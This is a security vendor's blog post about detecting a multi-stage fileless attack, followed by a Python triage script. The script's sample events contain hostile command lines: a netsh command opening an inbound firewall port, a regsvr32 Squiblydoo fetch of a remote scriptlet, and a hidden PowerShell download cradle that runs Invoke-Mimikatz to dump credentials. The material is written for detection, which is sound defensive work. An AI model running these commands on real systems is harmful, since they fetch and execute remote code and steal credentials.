Detecting and Mitigating Multi-faceted Fileless Attacks
BlueVoyant

“Life in the SOC” is a blog series that shares the experiences of the BlueVoyant SOC in defending against the current and prevalent attacks our clients encounter. The posts discuss successful detection, response and mitigation actions that can improve your own defensive capabilities.

Security experts estimate that around 35% of all attacks are now fileless, and our experience at the BlueVoyant SOC bears this out. Fileless attacks present a unique challenge to a SOC because they evade signature-based antivirus: they do not write a malicious executable to disk to infect the endpoint, they run in memory, and they use built-in system tools and approved applications to carry out the attack. The SOC therefore has to rely on behavioral detection tools, whose output must be interpreted by skilled security analysts to detect, respond and mitigate.

The BlueVoyant SOC recently defended against a sophisticated, multi-faceted fileless attack. The ultimate goal was to install a coinminer, but a great deal more malicious activity occurred along the way. The attack relied on living-off-the-land techniques, using native Windows tools to avoid detection. It began with PowerShell scripts and netsh commands that opened ports in the Windows host firewall on our client’s machines. It then used four different WMI mechanisms to establish an advanced form of persistence on three hosts, and used Squiblydoo (regsvr32 fetching a remote scriptlet through scrobj.dll) to download eight pieces of malware. The most dangerous component was a PowerShell variant of Mimikatz, used to scrape credentials and potentially give the attacker free rein across every device on the network. Mimikatz was loaded directly into memory without ever touching disk, so file-based antivirus scanning had nothing to inspect. The attack then dropped Mirai and the XMRig coinminer. Interestingly, it also looked for and removed other malware on the device so that its own coinminer would be the only one running.
The BlueVoyant Threat Fusion Cell team continuously investigates the threat landscape to identify unknown and emerging threats. They had provided our SOC with a list of indicators and a detailed write-up on this new fileless attack, so when our client was hit, we were ready. Our SOC analysts immediately removed the artifacts used to create persistence on the infected devices and updated a specific NextGen AV policy to block Squiblydoo. They detected and blacklisted the eight pieces of malware, and used EDR (Endpoint Detection and Response) to analyze behaviors, confirm the legitimacy of every PowerShell execution, and investigate process ancestry. This was a very advanced attack with many moving parts, and detecting, responding to and mitigating it required multiple security tools, threat intelligence and an expert SOC analyst team.
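The behaviors described above (netsh firewall changes, Squiblydoo via regsvr32, PowerShell download cradles and in-memory Mimikatz, and WMI-driven persistence surfaced through process ancestry) reduce to a small set of process-creation detections that an analyst can run over endpoint telemetry. The following Python script is an added example written for this page, not BlueVoyant's own detection content or tooling. The rules, host names and sample events (modeled on Sysmon Event ID 1 / Security 4688 fields, using a TEST-NET address) are constructed for illustration, because the post does not publish the actual command lines, indicators or WMI classes from the incident. It also includes benign administrative uses of the same binaries, which must not alert.

```python
"""Triage of constructed Windows process-creation events for the living-off-the-land
behaviors discussed in the post. The rules and sample events below are this example's
own assumptions, not BlueVoyant's detections or data from the incident."""
import re
from dataclasses import dataclass

# Constructed sample events, modeled on Sysmon Event ID 1 / Security 4688 fields.
# The post does not publish the real command lines, so these are illustrative only.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="upd" dir=in action=allow '
                'protocol=TCP localport=14444'},
    {"host": "ws01", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.10/m.ps1'); Invoke-Mimikatz -DumpCreds\""},
    # Benign administrative use of the same binaries; these must produce no findings.
    {"host": "ws03", "image": r"C:\Windows\System32\netsh.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "netsh interface show interface"},
    {"host": "ws03", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'},
]


@dataclass(frozen=True)
class Rule:
    name: str
    image: str          # regex on the process image file name
    cmdline: str = ""   # regex on the command line (empty = any)
    parent: str = ""    # regex on the parent image file name (empty = any)


RULES = [
    # Port opened in the Windows host firewall (modern and legacy netsh syntax).
    Rule("netsh_firewall_rule_added", r"^netsh\.exe$",
         r"advfirewall\s+firewall\s+add\s+rule|firewall\s+(add|set)\s+portopening"),
    # Squiblydoo: regsvr32 pulling a remote scriptlet and executing it via scrobj.dll.
    Rule("squiblydoo_regsvr32_remote_sct", r"^regsvr32\.exe$",
         r"[/-]i:\s*https?://.*scrobj\.dll"),
    # In-memory download cradle or encoded command; nothing is written to disk.
    Rule("powershell_download_cradle", r"^powershell(_ise)?\.exe$",
         r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String)\b"
         r"|\s-e(nc|ncodedcommand)?\s"),
    # PowerShell Mimikatz variant (Invoke-Mimikatz) scraping credentials from LSASS.
    Rule("mimikatz_loaded_in_memory", r"^powershell(_ise)?\.exe$",
         r"Invoke-Mimikatz|sekurlsa|logonpasswords"),
    # CommandLineEventConsumer actions run as children of WmiPrvSE.exe, so a LOLBin with
    # that parent is the process-ancestry signal that a WMI event subscription fired.
    Rule("wmi_event_consumer_spawned_lolbin",
         r"^(powershell(_ise)?|cmd|regsvr32|mshta|wscript|cscript|rundll32)\.exe$",
         parent=r"^WmiPrvSE\.exe$"),
]


def _basename(path: str) -> str:
    """File name component of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def match_rules(event: dict) -> list[str]:
    """Return the names of every rule the event satisfies (empty list if benign)."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    cmd = event["cmdline"]
    hits = []
    for r in RULES:
        if not re.search(r.image, image, re.I):
            continue
        if r.parent and not re.search(r.parent, parent, re.I):
            continue
        if r.cmdline and not re.search(r.cmdline, cmd, re.I):
            continue
        hits.append(r.name)
    return hits


def triage(events: list[dict]) -> dict[str, set[str]]:
    """Group findings per host so the analyst sees the attack chain, not isolated alerts."""
    findings: dict[str, set[str]] = {}
    for ev in events:
        hits = match_rules(ev)
        if hits:
            findings.setdefault(ev["host"], set()).update(hits)
    return findings


if __name__ == "__main__":
    for host, names in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {', '.join(sorted(names))}")
```

Run as a script it prints the per-host findings; in practice you would feed it exported EDR or Sysmon events and treat a host that shows both a WmiPrvSE.exe-spawned LOLBin and a download cradle as a persistence case to clean up, not as two unrelated alerts. One caveat on the ancestry rule: it only catches CommandLineEventConsumer actions. An ActiveScriptEventConsumer runs its script inside scrcons.exe instead, so a complete WMI persistence hunt also enumerates the __EventFilter, event consumer and __FilterToConsumerBinding instances in the root\subscription namespace directly rather than relying on process telemetry alone.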